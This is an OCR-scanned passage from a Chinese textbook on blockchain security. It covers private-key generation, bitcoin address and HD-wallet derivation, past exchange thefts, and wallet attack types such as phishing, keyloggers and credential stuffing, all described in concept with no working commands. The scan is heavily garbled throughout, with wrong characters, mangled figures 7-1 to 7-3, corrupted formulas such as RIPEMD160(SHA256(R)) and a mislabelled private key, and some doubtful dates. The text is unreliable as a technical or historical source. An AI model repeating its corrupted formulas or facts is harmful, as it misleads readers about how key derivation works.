货币 中 攻击 者 用 更 大 代价 的 货币 来 换取 较 小 价值 的 比特 币 是 不 划算 的 。 但 区 块 链 应 用 前 景 广阔 ， 不 排除 攻击 者 为 了 某 种 目的 不 惜 成 本 地 攻击 ， 且 理论 上 技术 手段 可 实现 。 


在 使 用 安全 性 方面 ， 区 块 链 技术 的 一 大 特点 就 是 不 可 逆 、 不 可 伪造 ， 但 前 提 是 私 钥 是 安全 的 。 私 钥 是 用 户 生 成 并 保管 的 ， 没 有 第 三 方 参与 。 私 钥 一 旦 丢失 ， 便 无 法 对 账户 的 资产 进行 任何 操作 。 


在 实现 方面 ， 由 于 区 块 链 大 量 应 用 了 各 种 密码 学 技术 ， 属 于 算法 高 度 密 集 工程 ， 在 实现 上 比较 容易 出 现 问题 。 历 史上 曾 有 过 此 类 先例 ， 比 如 NSA 对 RSA 算 法 实现 埋 入 了 缺陷 ， 使 其 能 够 轻松 破解 别人 
的 加 密 信息 。 一 旦 爆发 这 种 级 别 的 漏洞 ， 可 以 说 区 块 链 整个 大 厦 的 基础 将 龙 然 倒塌 ， 不 会 有 一 个 幸存 者 。 


在 系统 安全 性 方面 ， 面 临 着 黑客 利用 上 述 安 全 漏洞 ， 达 成 攻击 目的 的 威胁 。 目 前 ,黑客 攻击 已 经 对 区 块 链 系统 安全 性 造成 很 大 影响 。 


面 对 区 块 链 系统 的 各 种 安全 性 挑战 ， 应 考虑 综合 运用 密码 学 、 拟 态 防 御 等 网 络 安全 技术 ， 从 算法 、 协 议 、 使 用 、 实 现 和 系统 等 方面 提高 区 块 链 的 安全 性 ， 应 对 现存 的 安全 性 挑战 。 比 如 ， 尽 早 设计 适 
合 区 块 链 系统 的 抗 量 子 攻 击 算法 、 拒 绝 算 力 超过 40% (或 更 低 ) 的 节点 加 入 整个 网 络 、 使 用 可 有 效 防御 黑客 网 络 攻击 的 拟态 防御 技术 到 区 块 链 系统 ， 来 应 对 区 块 链 系 统 所 面临 的 系统 安全 性 挑战 等 。 


6.6 ”本章 小 结 





本 章 从 区 块 链 的 核心 技术 之 加 密 技术 出 友 ， 具 体 讲 解 了 加 密 技术 在 区 块 链 中 的 使 用 ， 洱 盖 非 对 称 加 密 、 签 名 技术 、CA 认 证 等 数据 层面 安全 技术 原理 。 此 外 ， 本 章 还 结合 Hyperleger Fabric 等 
主流 区 块 链 技术 进行 具体 实现 的 演示 ， 在 实际 使 用 过 程 中 也 具有 一 定 的 参考 价值 。 本 章 最 后 讲解 了 几 种 主要 的 共识 攻击 方法 ， 以 及 区 块 链 中 典型 的 解决 方法 。 


第 7 章 ” 私 钥 的 安全 


私 钥 在 区 块 链 技术 中 至 关 重 要 。 本 章 分 析 了 私 钥 安全 在 区 块 链 技术 中 的 重要 地 位 ， 介 绍 了 当前 主流 区 块 链 私 钥 的 使 用 方法 和 存在 的 问题 ， 然 后 从 私 铀 保护 的 技术 要 求 和 产业 链 以 及 政策 角度 分 析 了 私 
钥 保 护 的 正确 姿势 ; 接 下 来 ， 分 析 了 硬件 钱包 的 产品 特性 和 原理 ， 并 重点 提出 了 移动 钱包 如 何 利 用 TEE、 多 方 密 钥 协 同等 技术 提高 安全 性 ; 最 后 探讨 了 私 钥 管理 中 ， 更 新 、 找 回 和 吊销 的 各 种 问题 。 


7.1 ” 私 钥 安全 的 重要 性 


区 块 链 凭借 完善 的 协议 与 架构 设计 ， 构 筑 了 安全 、 可 信 的 人 存储 与 交易 网 络 。 然 而 ， 区 块 链 的 核心 是 密码 算法 ， 密 码 算法 的 核心 是 算法 本 身 和 密 钥 的 生命 周期 管理 。 密 钥 的 生命 周期 包括 密 铀 的 生成 
(随机 数 的 质量 ) 、 存 储 、 使 用 、 找 回 等 。 虽 然 区 块 链 协 议 设计 得 非常 严谨 ， 但 作为 用 户 身份 凭证 的 私 钥 安 全 却 成 为 整个 区 块 链 系 统 的 安全 短 板 。 通 过 窃取 或 删除 私 钥 ， 就 可 轻易 地 攻击 数字 资产 权益 ， 
给 持 有 人 带 来 巨大 的 损失 。 这 样 的 恶性 事件 已 经 不 止 一 次 地 出 现 ， 足 以 给 人 们 敲 响 警 钟 。 


" 2014 年 2 月 24 日 ， 当 时 世界 上 最 大 的 比特 币 交 易 所 运营 商 一 一 Mt.Gox (俗称 “门头沟 ”) 宣布 其 交易 平台 的 85 万 个 比特 币 被 资 一 空 ， 随 后 火速 下 线 并 申请 破产 保护 。 


. 2015 年 2 月 18 日 ， 比 特 币 存 钱 负 发 表 声明 ， 其 服务 器 被 入 侵 ， 黑 客 所 资 取 的 比特 币 数量 超过 3000 个 ， 随 后 网 站 关闭 。 





. 2016 年 8 月 3 日 凌晨 ， 最 大 的 美元 比特 币 交 易 平 台 Bitfinex 官 网 挂 出 公告 ; 由 于 网 站 出 现 安 全 漏洞 ， 导 致 用 户 持 有 的 比特 币 被 资 。 被 盗 的 比特 币 共 119756 枚 ， 当 时 总 价值 约 为 6500 万 美元 。 
. 2017 年 7 月 17 日 ，coindash 官 网 被 黑 ，ICO 的 收 坎 地 址 被 更 挽 成 了 黑客 的 ，4 万 个 以 太 币 被 打 入 黑客 地 址 ， 价 值 4400 万 元 (人 民 币 ) 。 
. 2017 年 8 月 ， 笔 者 有 个 微 信 好 友 反 馈 说 ， 其 误 点 了 他 人 发 来 的 图 片 ， 导 致 价值 2000 万 元 的 比特 币 丢失 。 


私 钥 持 有 者 才 是 比特 币 的 拥有 者 ， 密 钥 即 一 切 。 私 钥 如 被 第 三 者 获取 ， 则 比特 币 将 被 转移 。 如 不 愤 弄 丢 私 钥 ， 则 永远 失去 这 笔 比特 币 ， 并 且 这 笔 比特 币 将 永久 沉睡 。 


7.2 ”主流 区 块 链 私 钥 的 使 用 方法 和 问题 分 析 


以 比特 币 为 例 ， 私 铀 存储 在 比特 币 钱包 中 ， 在 交易 中 使 用 该 私 钥 签名 。 接 下 来 介绍 一 下 比特 币 钱包 的 生成 过 程 以 及 交易 处 理 过 程 ， 以 说 明 私 钥 在 区 块 链 技术 中 的 作用 。 


1. 比 特 币 钱包 的 原理 


比特 币 的 所 有 权 是 通过 数字 密 钥 、 比 特 币 地 址 和 数字 签名 来 确立 的 。 数 字 密 钥 由 用 户 生 成 并 存储 在 数字 钱包 (也 称 比特 币 钱包 ) 。 钱 包 中 包含 成 对 的 私 钥 和 公 钥 。 用 户 用 私 钥 来 签名 交易 ， 从 而 证 明 
他 们 拥有 交易 的 输出 (其 中 的 比特 币 ) ;而 通过 公 钥 生成 的 比特 币 地 址 ， 则 用 于 收 款 。 以 下 分 别 对 公 / 私 钥 、 比 特 币 地 址 、 比 特 币 钱包 进行 说 明 。 


(1) 公 钥 和 私 钥 


比特 币 使 用 椭圆 曲线 算法 作为 其 公 钥 加 密 的 基础 算法 。 


每 个 密 钥 对 包括 一 个 私 钥 和 一 个 公 钥 。 私 钥 是 一 个 随机 选择 的 数字 ， 由 256 位 的 二 进 制 数字 组 成 ， 由 随机 数 生 成 。 

使 用 椭圆 曲线 算法 这 个 单 向 加 密 函 数 ， 由 私 钥 生 成 公 铀 ; 而 反 向 用 公 钥 求解 私 铀 的 过 程 是 非常 困难 的 ， 被 称 为 “寻找 离散 对 数 ”。 

在 椭圆 曲线 上 ， 公 钥 计 算 方法 为 : 

K=k*G 

其 中 ，K 是 私 钥 ，G 是 生成 点 ， 在 该 曲线 上 所 得 的 点 K 是 公 钥 。 比 特 币 中 的 生成 点 G 都 是 相同 的 。 

在 比特 币 中 ， 私 钥 和 公 钥 可 以 用 多 种 编码 格式 表示 。 公 钥 分 为 非 压 缩 格式 公 钥 和 压缩 格式 公 钥 两 种 。 其 中 ， 非 压缩 格式 公 钥 的 前 缀 是 04， 压 缩 格式 公 钥 的 前 缀 是 02 或 者 03。 
(2) 比特 币 地 址 


比特 币 地 址 是 一 个 由 数字 和 字母 组 成 的 字符 串 ， 通 常 作为 收 款 方 出 现 。 由 公 钥 生成 比特 币 地 址 时 使 用 的 算法 是 SHA (Secure Hash Algorithm) 和 RIPEMD (RACE Integrity Primitives Evaluation 
Message Digest) ， 特 别 是 SHA256 和 RIPEMD160。 


以 公 铀 K 为 输入 ， 计 算 其 SHA256 哈 希 值 ， 并 用 该 结果 计算 RIPEM D160 哈 希 值 ， 得 到 一 个 长 度 为 160 比 特 (20 字 节 ) 的 数字 : 
A=RIPEMD160(SHA256(R)) 
其 中 ，K 是 公 铜 ，A 是 生成 的 比特 币 地 址 。 


通常 ， 比 特 币 地 址 是 经 过 Base58Check 编 码 的 ， 这 种 编码 使 用 了 58 个 字符 (一 种 Base58 数 字 系统 ) 和 校 验 码 ， 提 高 了 可 读 性 ， 避 免 了 歧义 ， 并 有 效 防 止 了 在 地 址 转录 和 输入 中 产生 的 错误 。 如 图 7-1 
是 公 钥 生成 比特 币 地 址 的 过 程 。 


从 公 负 到 比特 币 地 址 









SHA256 
“ 双 哈 希 ” 或 称 
Hash160 
RIPEMD160 





Base58check 纺 公 
前 级 版 本 为 0x00 


比特 币 地 址 


(BaseS8Check 编 码 的 公 钥 哈 希 ) 


图 7-1 从 公 和 铀 生成 比特 币 地 址 上 





(3) 比特 币 钱包 
作为 私 钥 的 容器 ， 比 特 币 钱包 有 两 种 类 型 ， 即 非 确定 性 (随机 ) 钱包 和 确定 性 (种 子 ) 钱包 。 


早期 的 比特 币 钱包 属于 非 确定 性 (随机 ) 钱包 ， 钱 包 是 随机 生成 的 私 钥 集合 ， 通 过 有 序 文件 或 简单 的 数据 库 实现 。 这 种 钱包 的 缺点 是 对 于 钱包 中 的 多 个 随机 私 铀 ， 需 要 经 常 性 地 备份 ， 以 免 钱包 不 能 
访问 时 ， 钱 包 所 控制 的 资金 将 不 能 再 被 使 用 。 


目前 使 用 较 多 的 确定 性 (种 子 ) 钱包 通过 使 用 单项 离散 方程 可 从 公共 的 种 子 生成 私 钥 ， 只 需 在 初始 创建 时 做 一 次 备份 即 可 。 该 类 型 钱包 中 ， 代 表 性 的 是 分 层 确定 性 钱包 (Hierarchical Deterministic 
Wallet 或 HD Wallet) ， 简 称 HD 钱 包 。 


HD 钱包 由 单个 根 种 子 创建 ， 根 种 子 为 128 ~ 256 位 的 随机 数 。 为 了 便于 用 户 抄 写 和 备份 ， 根 种 子 表 示 为 助 记 码 词汇 序列 。 使 用 HMAC-SHA512 算 法 ， 可 以 由 根 种 子 衍 生出 子 密 钥 序 列 ， 继 而 衍生 出 孙 
密 钥 序列 ， 以 此 无 穷 类 推 。 


助 记 码 和 种 子 的 创建 过 程 如 下 : 


1) 创造 一 个 128 ~ 256 位 的 随机 顺序 ( 业 ) 。 

2) 提出 SHA256 哈 希 前 几 位 ， 就 可 以 创造 一 个 随机 序列 的 校 验 和 。 

3) 把 校 验 和 加 在 随机 顺序 的 后 面 。 

4) 把 顺序 分 解 成 11 位 的 不 同 集合 ， 并 用 这 些 集合 去 和 一 个 预先 已 经 定义 的 由 2048 个 单词 组 成 的 字典 做 对 比 ; 
5) 生成 一 个 12 ~ 24 个 词 的 助 记 码 。 


创建 主 密 钥 以 及 HD 钱包 的 主 链 编 码 的 过 程 如 图 7-2 所 示 。 根 种 子 输入 到 HMAC-SHA512 算 法 中 ， 就 可 以 得 到 一 个 可 用 来 创造 主 私 钥 m 和 主 链 编码 的 哈 希 。 使 用 椭圆 曲线 上 的 K=k*G 可 以 由 主 私 钥 m 生 
成 相对 应 的 主公 钥 M。 


主 私 钥 m 
(256 blts ) 


密码 学 上 安全 的 


HMAC SHAS12 主 私 钥 M 


根 种 子 


(128，256 或 512 bits) (512 bits 输 出 ) 


单 问 哈 希 函数 


(264 bits) 





主 链 编码 
助 记 码 (256 bits) 





图 7-2 ”由 根 种 子 创 建 主 密 钥 以 及 主 链 编 码 


由 根 种 子 生成 主 私 铀 和 主 链 编码 之 后 ， 还 可 以 从 主 私 铀 和 主 链 编码 并 结合 索引 号 使 用 HMAC-SHA512 哈 希 国 数 派生 出 下 一 层 的 子 私 铀 和 子 链 编码 ， 如 此 循环 ， 如 图 7-3 所 示 。 


网 天 子 私 铀 
父 私 铀 (索引 0 ) 


256 bit 
\ Wy) ( 256 bits ) 








HMAC-SHAS12 
人 入 AN 和 
父 公 钥 ( 512 bits 输 出 ) 


( 264 bits ) 
单 回 哈 希 困 数 


子 公 包 
( 264 bits ) 





子 链 编 码 
父 链 编码 (索引 0 ) 
(256 bits ) (256 bits ) 


索引 号 
( 32 bits， 例 如 0 ) 


图 7-3 ”由 父 私 钥 创建 子 私 钥 以 及 子 链 编码 


2. 比 特 币 交易 的 原理 


比特 币 交易 是 比特 币 系统 中 最 重要 的 部 分 。 根 据 比特 币 系统 的 设计 原理 ， 系 统 中 任何 其 他 的 部 分 都 是 为 了 确保 比特 币 交易 可 以 被 生成 、 能 在 比特 币 网 络 中 得 以 传播 和 通过 验证 ， 并 最 终 添 加 至 全 球 比 
特 币 账本 中 。 


比特 币 交易 的 生命 周期 为 : 使 用 私 钥 签 名 创建 交易 、 将 交易 广播 到 比特 币 网 络 节 点 、 节 点 验证 交易 并 继续 广播 、 每 个 收 到 该 交易 的 节点 都 尝试 将 交易 记录 到 账本 中 。 


在 交易 的 每 个 输出 中 ， 定 义 了 支付 输出 所 需 条 件 的 锁定 脚本 。 在 最 为 常见 的 交易 中 ， 锁 定 脚本 会 把 输出 锁 在 一 个 特定 的 比特 币 地 址 上 ， 从 而 把 一 定数 量 的 比特 币 的 所 有 权 转 移 到 新 的 所 有 者 上 。 在 交 
易 的 每 个 输入 中 ， 定 义 了 解锁 脚本 。 解 锁 脚本 通常 是 一 个 签名 ， 用 来 证 明 对 于 输入 中 引用 交易 的 锁定 脚本 中 的 比特 币 地 址 拥有 所 有 权 。 


3. 常 见 的 比特 币 钱包 以 及 安全 风险 分 析 
(1) 常见 比特 币 钱包 
比特 币 钱 包 一 般 分 为 在 线 钱包 、 本 地 钱包 、 离 线 钱包 等 几 种 类 型 。 
在 线 钱包 一 般 是 在 线 的 网 站 提供 的 钱包 服务 ， 私 钥 由 网 站 托管 ， 用 户 通过 口令 或 其 他 认证 手段 登录 网 站 ， 从 而 获取 私 钥 的 操作 权限 。 比 如 BlockChain.info、Inputs.io 等 。 


本 地 钱包 即 桌面 程序 ， 运 行 在 用 户 本 地 操作 系统 ， 密 钥 在 本 地 生成 (保存 在 名 为 wallet.dat 的 文件 中 ) ， 并 由 口令 等 因素 加 密 。 比 如 Bitcoin-Qt (官方 客户 端 ， 基 于 C+ +/Qt， 全 平台 ) 、 
MultiBit (全 平台 ， 轻 钱包 ， 官 方 推荐 ) 、Electrum (著名 轻 钱包 ) 、Armory (基于 Python ， 含 有 诸多 特性 的 轻 钱包 ) 等 。 


离线 钱包 有 时 也 被 称 为 “ 冷 人 存储 ”， 是 指 在 一 个 不 联网 的 计算 机 中 ， 使 用 本 地 钱包 软件 生成 私 铀 ， 在 不 联网 的 情况 下 对 交易 进行 签名 ， 然 后 通过 U 盘 等 存储 介质 把 交易 内 容 复制 到 联网 的 计算 机 中 ， 再 
广播 该 交易 。 


(2) 常见 比特 币 钱包 面临 的 安全 风险 分 析 
在 线 钱包 的 安全 性 很 低 ， 针 对 其 常见 的 攻击 非常 多 ， 如 网 络 钓鱼 、 键 盘 记 录 器 、Cookie 支 持 、 云 端 拖 库 、 撞 库 、 内 鬼 作案 等 。 
1) 网 络 钓鱼 。 


网 络 钓鱼 (Phishing， 与 钓鱼 的 英语 Fishing 发 音 相近 ， 故 又 名 钓鱼 法 或 钓鱼 式 攻击 ) 是 一 种 很 常见 的 攻击 方式 ， 如 通过 大 量 发 送 声 称 来 自 于 银行 或 其 他 知名 机 构 的 欺骗 性 垃圾 邮件 ， 意 图 引诱 收 信人 
给 出 敏感 信息 (如 用 户 名 、 口 令 、 账 号 ID、ATM PIN 码 或 信用 卡 详细 信息 ) 。 


最 典型 的 网 络 钓鱼 攻击 是 将 收 信人 3 引诱 到 一 个 经 过 精心 设计 、 与 目标 组 织 的 网 站 非常 相似 的 钓鱼 网 站 上 (比如 工商 银行 的 域名 是 www.icbc.com， 有 一 个 著名 的 钓鱼 网 站 域名 是 www.1cbc.com) ， 
并 获取 收 信人 在 此 网 站 上 输入 的 个 人 敏感 信息 。 通 常 这 个 攻击 过 程 不 会 让 受害 者 警觉 ， 甚 至 使 用 了 短信 一 次 性 口令 、 动 态 口令 (OTP) Token 的 也 无 法 抵御 钓鱼 攻击 。 它 是 “社会 工程 攻击 ”的 一 种 形 
Ea 


当 用 户 输入 账户 信息 和 口令 之 后 ， 这 些 信息 会 被 发 送 给 黑客 ， 然 后 黑客 自然 获得 私 钥 的 权限 和 背后 的 比特 币 。 

当然 了 ， 因 为 所 有 顶级 的 在 线 钱包 提供 商都 会 有 有 SSL 保护 ， 如 果 细 心 点 的 话 ， 还 是 可 以 轻松 辨别 出 这 些 “ 李 鬼 ” 的 。 

2) 键盘 记录 器 。 

键盘 记录 是 捕获 用 户 密 码 常见 的 方法 。 简 单 地 说 ， 一 个 键盘 记录 器 其 实 就 是 一 段 脚本 代码 ， 一 旦 将 其 安装 在 目标 计算 机 的 操作 系统 上 ， 它 就 会 记录 键盘 上 所 有 的 询 击 ， 并 发送 给 黑客 。 
键盘 记录 器 是 一 种 特殊 的 木马 ， 通 常 是 通过 Web 浏 览 器 注入 的 ， 也 和 目标 机 器 的 安全 漏洞 、 浏 览 器 漏洞 或 其 他 软件 漏洞 有 关 。 

3) Cookie 动 持 。 


Cookie 动 持 (或 称 之 为 会 话 支持 ) 是 指 利 用 一 个 有 效 计算 机 的 会 话 ， 来 恶意 获得 目标 机 器 未 经 授权 的 访问 信息 或 者 服务 。 用 户 登 录 成 功 后 ， 后 合 就 是 通过 会 话 确认 浏览 器 的 身份 。 如 果 黑 客 会 话 劫持 
成 功 ， 则 可 以 获得 用 户 登录 状态 ， 从 而 任意 操作 私 钥 。 

4) 云端 拖 库 。 

黑客 利用 网 站 的 Web 漏 洞 、 服 务 器 漏洞 或 者 错误 的 配置 ， 比 如 SQL 注入 、 文 件 上 传 漏洞 、 防 火 墙 错误 的 配置 、 数 据 库 错误 的 配置 等 ， 在 网 站 建立 后 门 ， 获 取 相 关 权 限 ， 直 接 下 载 数据 库 。 那 么 保存 到 
数据 库 中 的 用 户 名 、 密 码 、 私 钥 信 息 等 将 被 完全 暴露 给 黑客 。 历 史上 CSDN、 和 天涯、 世纪 佳缘 、 网 易 邮 箱 、 人 人 网 、 猫 扑 、 京 东 等 都 发 生 过 密码 泄漏 事件 。 

5) 撞 库 。 


撞 库 是 指 黑客 通过 收集 互联 网 上 已 泄漏 的 用 户 账号 和 密码 信息 ， 生 成 对 应 的 字典 表 ， 尝 试 批量 登录 其 他 网 站 后 ， 得 到 一 系列 可 以 登录 的 用 户 信息 。 很 多 用 户 在 不 同 网 站 使 用 的 是 相同 的 账号 、 密 码 ， 
因此 黑客 可 以 通过 获取 用 户 在 A 网 站 的 账户 去 尝试 登录 B 网 站 ， 这 就 可 以 理解 为 撞 库 攻击 。2014 年 12 月 25 日 ，12306 网 站 用 户 信息 在 互联 网 上 疯 传 。 对 此 ，12306 官 方 网 站 称 ， 网 上 泄漏 的 用 户 信息 系 经 其 
他 网 站 或 渠道 流出 。 据 悉 ， 此 次 泄漏 的 用 户 数据 不 少 于 131653 条 。 该 批 数据 基本 可 以 确认 是 黑客 通过 “ 撞 库 攻击 ”获得 的 。 


6) 内 鬼 作 案 。 


内 鬼 即 为 网 站 平台 的 内 部 工作 人 员 。 他 们 利用 工作 便利 或 管理 的 漏洞 ， 直 接 操作 数据 库 获取 用 户 名 、 口 令 和 私 钥 ， 从 而 获得 用 户 的 比特 币 。 互 联网 上 很 多 数据 泄漏 事件 都 是 源 于 内 部 人 士 作案 。 对 于 
到 动 一 时 的 MT.Gox 比 特 币 失窃 ， 到 目前 为 止 ， 尚 未 有 明确 论断 ， 网 络 上 众说 纷 练 。MT.Gox 宣 称 遭 到 了 黑客 入 侵 导 至 了 丢失 ， 而 也 有 一 些 人 分 析 交 易 所 本 身 监 守 自 盗 ， 早 已 把 这 些 币 都 卖 给 了 其 他 交易 平 


一 
口 。 


7) 木马 + 暴力 破解 。 


黑客 利用 计算 机 的 漏洞 或 者 社会 攻击 (伪装 成 精美 图 片 让 用 户 下 载 安装 ) 使 用 户 计算 机 种 下 木马 ， 从 而 获取 比特 币 钱包 文件 。 黑 客 获 取 到 比特 币 钱包 后 ， 通 过 暴力 破解 的 方式 猜测 到 用 户 的 钱包 口 
， 从 而 获得 其 比特 币 的 控制 权 。 


少 


8) 木马 + 键盘 记录 器 。 


针对 本 地 钱包 ， 木 马 配合 键盘 记录 器 可 以 远程 获取 比特 币 文件 和 保护 口令 ， 从 而 获得 该 比特 币 的 控制 权 。 


4. 区 块 链 私 钥 安 全 问题 总 结 


私 钥 在 其 生命 周期 中 如 何 确 保安 全 是 密码 系统 安全 的 基础 ， 也 是 区 块 链 可 信 的 基石 。 区 块 链 私 钥 的 安全 涉及 私 钥 的 生成 、 人 存储、 使 用 、 找 回 、 销 毁 、 更 新 等 几 个 环节 。 


(1) 私 钥 的 生成 


区 块 链 的 私 钥 使 用 非 对称 算 法 (椭圆 曲线 密码 学 ，ECC) ， 私 钥 自身 的 质量 取决 于 产生 私 钥 的 随机 数 的 质量 。 可 以 说 ， 随 机 数 是 以 现代 密码 学 为 基础 的 信息 安全 系统 的 基石 ， 整 个 系统 的 安全 性 完全 


依赖 于 随机 数 序列 的 生成 效率 和 质量 。 高 质量 的 随机 数 的 核心 是 “不 可 预测 性 ”。 


随机 数 有 两 种 : 伪 随 机 和 真 随机 。 顾 名 思 义 ， 伪 随机 就 是 假 随机 。 一 般 依靠 种 子 和 算法 ， 知 道 种 子 或 者 已 经 产生 的 随机 数 ， 可 以 获得 接 下 来 的 随机 数 ， 具 有 可 预测 性 。 这 种 随机 数 玩 玩 游戏 可 以 ， 用 
于 区 块 链 的 私 铀 则 太 不 安全 了 。 一 般 软 件 操作 系统 提供 的 随机 数 函 数 都 是 伪 随 机 。 当 前 主流 的 区 块 链 系统 都 是 用 该 方法 生成 私 铀 ， 安 全 性 堪忧 。 


(2) 私 钥 的 存储 

当前 区 块 链 的 私 钥 一 般 都 是 软 实 现 进行 存储 的 ， 以 文件 形式 保存 到 终端 或 服务 器 数据 库 中 ， 使 用 口令 作为 认证 手段 ， 很 容易 被 黑客 或 内 鬼 复 制 、 窃 取 、 暴 力 破 解 ， 安 全 风险 极 高 。 
(3) 私 钥 的 使 用 

私 钥 计算 软 实现 ， 加 载 私 铀 到 内 人 存 ， 通 过 CPU 完成 计算 。 计 算 过 程 中 私 钥 以 明文 的 形式 在 内 存 和 CPU 中 出 现 ， 很 容易 被 攻击 程序 获取 。 


[1] 图 片 引 用 自 《 精 通 比特 币 》 。 


7.3” 私 钥 保护 的 正确 “姿势 " 


1. 私 钥 保护 的 技术 要 求 


正确 地 保护 私 钥 ， 需 要 从 生成 、 存 储 、 使 用 等 几 个 环节 入 手 。 
(1) 私 钥 的 生成 


使 用 真 随机 生成 私 钥 。 高 质量 的 随机 数 的 核心 是 “不 可 预测 性 ”,， 一 般 基 于 硬件 ， 根 据 外 界 的 温度 、 电 压 、 电 磁场 、 环 境 噪声 等 产生 随机 数 。 国 家 密码 管理 局 发 布 的 《随机 性 检测 规范 》 至 少 包括 15 
个 检测 项 目 ， 比 如 单 比特 频数 检测 、 块 内 频数 检测 、 扑 克 检 测 、 重 对 子 序列 检测 、 线 性 复杂 度 检测 、 离 散 傅 里 叶 检 测 等 。 使 用 随机 数 生成 设备 生成 随机 数 ， 通 过 检测 确保 随机 数 质量 后 ， 才 可 以 作为 私 钥 
使 用 。 


能 够 产生 真 随机 的 设备 ， 一 般 都 是 经 过 特殊 设计 的 带 有 随机 数 发 生 器 的 专用 密码 设备 。 其 中 金融 领域 的 IC 卡 、U 盾 、 加 密 机 等 均 是 采用 此 设计 。 
(2) 私 钥 的 存储 


硬 存 储 通常 是 依托 专用 密码 安全 芯片 或 者 密码 设备 作为 载体 ， 一 般 有 物理 保护 、 敏 感 数据 保护 、 密 钥 保 护 等 机 制 ， 确 保 私 钥 必 须 由 专用 硬件 产生 。 在 任何 时 间 、 任 何 情况 下 ， 私 钥 均 不 能 以 明文 形式 
出 现在 密码 设备 外 ; 密码 设备 内 部 存储 的 密 钥 应 具备 有 效 的 密 钥 保护 机 制 ， 防 止 解 剖 、 探 测 和 非法 读 取 。 


(3) 私 钥 的 使 用 


通过 密码 设备 自身 独立 的 安全 认证 后 (口令 或 指纹 ) ， 把 待 签名 或 加 密 的 数据 输入 到 密码 设备 中 ， 在 密码 设备 内 部 完成 计算 ， 最 后 把 计算 结果 输出 。 在 此 过 程 中 ， 私 钥 不 可 导出 ， 也 未 在 计算 机 的 
CPU、 内 存 出 现 过 。 比 如 金融 领域 常见 的 U 盾 (UKEY) 、 金 融 IC 卡 、 加 密 机 等 均 属 于 此 类 方式 。 


2. 密 码 产 业 链 和 政策 
(1) 他 山 之 石 ， 可 以 攻 玉 


实际 上 密码 产业 在 国内 外 都 已 经 非常 成 熟 ， 尤 其 是 PKI/CA 行 业 ， 其 在 密码 以 及 密码 应 用 上 有 着 非常 成 熟 的 技术 体系 、 技 术 标 准 、 政 策 法规 、 产 业 链 。 比 如 HTTPS 服 务 器 证 书 已 经 成 为 各 网 站 标 配 ， 网 
银 的 U 盾 数字 证 书 也 得 到 了 普及 。 


区 块 链 使 用 的 是 ECC/SHA256， 国 内 PKI/CA 行 业 使 用 RSA/SHA1， 近 几 年 正在 普及 SM2/SM3。SM2 是 一 种 国产 的 变种 的 ECC 算 法 ，SM3 是 一 种 国产 的 摘要 算法 。SM2、SM3 属 于 公开 的 算法 ， 相 关 
资料 可 以 从 国家 密码 管理 局 网 站 获取 。 


技术 标准 方面 ， 由 国家 密码 管理 局 牵头 发 布 了 一 系列 的 密码 技术 标准 ， 包 括 密码 算法 (SM1、SM2、SM3、SM4 等 ) 、 密 码 协 议 (数据 加 密 、 数 字 签 名 、 密 钥 协 商 、 身 份 鉴别 、 完 整 性 鉴别 等 ) 、 密 
码 应 用 标识 、 密 码 应 用 接口 (密码 设备 接口 、 密 码 服 务 接口 、 基 础 设施 接口 等 ) 、 产 品 检测 和 产品 管理 的 要 求 等 ， 已 经 形成 了 体系 。 


政策 法 规 方面 ，1999 年 我 国 就 发 布 了 《商用 密码 管理 条 例 》， 对 商用 密码 产品 的 科研 、 和 生产、 销售 和 使 用 进行 管理 。2017 年 国家 密码 管理 局 起 草 了 《中 华人 民 共和 国 密码 法 (草案 征求 意见 稿 ) 》， 
并 向 社会 公开 征求 意见 。 待 立法 通过 后 ,该 《密码 法 》 将 取代 《商用 密码 管理 条 例 》， 用 于 对 密码 的 科研 、 生 产 、 经 营 、 进 出 口 、 检 测 、 认 证 、 使 用 和 监督 管理 。 


在 密码 的 应 用 方面 ， 我 国 2015 年 就 颁布 实施 了 《电子 签名 法 》。 其 中 第 十 四 条 规定 : 可 靠 的 电子 签名 与 手写 签名 或 者 盖 章 具有 同等 的 法 律 效力 。 第 十 六 条 规定 : 电子 签名 需要 第 三 方 认 证 的 ， 由 依法 
设立 的 电子 认证 服务 提供 者 提供 认证 服务 。《 电 子 签名 法 》 为 电子 签名 无 纸 化 应 用 扫 清 了 障碍 ， 使 得 像 电子 发 票 、 电 子 合同 、 电 子 保单 、 电 子 招 投标 等 在 国内 得 到 了 很 好 的 应 用 。 第 三 方 认证 机 构 由 工 信 
部 监管 ， 当 前 已 经 有 四 十 余 家 机 构 获得 了 电子 认证 许可 ， 比 如 北京 数字 认证 (北京 CA) 、 中 国 金融 认证 中 心 (CFCA) 等 。 


密码 相关 产业 链 行业 规模 达到 数 百 亿 元 ， 成 就 了 数 十 家 上 市 公司 。 产 业 链 分 工 明 确 ， 涵 盖 密 码 芯片、 密码 设备 (IC 卡 、U 导 、 蓝 牙 盾 、 加 密 机 ) 、 电 子 签名 电子 签 章 软件 、VPN、 CA 系统 、 身 份 认证 
系统 等 。 


(2) 历史 总 是 惊人 的 相似 
PKI/CA 发 展 初期 ， 从 2000 年 到 2008 年 期 间 ， 软 证 书 曾 大 行 其 道 ， 甚 至 银行 、 政 府 等 都 曾经 使 用 软 证 书 。 所 谓 软 证 书 ， 即 私 钥 ， 作 为 一 个 文件 保存 在 用 户 浏 览 器 或 磁盘 中 。 


具体 到 网 银 上 ， 这 种 形式 的 私 钥 无 法 抵御 黑客 和 木马 的 攻击 ， 以 至 于 国内 连续 发 生 过 多 起 网 银 资 金 被 盗 的 事件 。2008 年 6 月 中 国 建设 银行 发 布 了 停止 个 人 网 银 软 证 书 网 上 支付 的 紧急 通知 ， 后 续 银 行 
监管 部 门禁 止 了 软 证 书 。 后 来 U 盾 大 行 其 道 ， 也 造就 了 飞天 诚信 这 样 的 上 市 公司 。 


针对 私 钥 的 保护 方面 ， 区 块 链 和 CA 面临 的 问题 是 一 致 的 ， 所 以 保护 私 钥 的 正确 方法 是 站 在 “巨人 ”的 肩膀 上 ， 借 鉴 和 利用 已 经 成 熟 的 产业 链 ， 使 用 国家 密码 局 鉴定 测试 过 的 密码 产品 作为 密码 模块 。 


74 ”硬件 钱包 介绍 


硬件 钱包 是 指使 用 特殊 硬件 介质 的 数字 钱包 ， 具 有 密 钥 生成 、 管 理 、 交 易 签名 等 功能 。 硬 件 比 特 币 钱包 使 用 双 因 素 (硬件 、 口 令 ) 认证 (2FA) ， 确 保 只 有 正确 的 人 才能 够 访问 一 个 安全 的 比特 币 钱 


包 。 


1.Ledger Nano S 硬 件 比特 币 钱包 


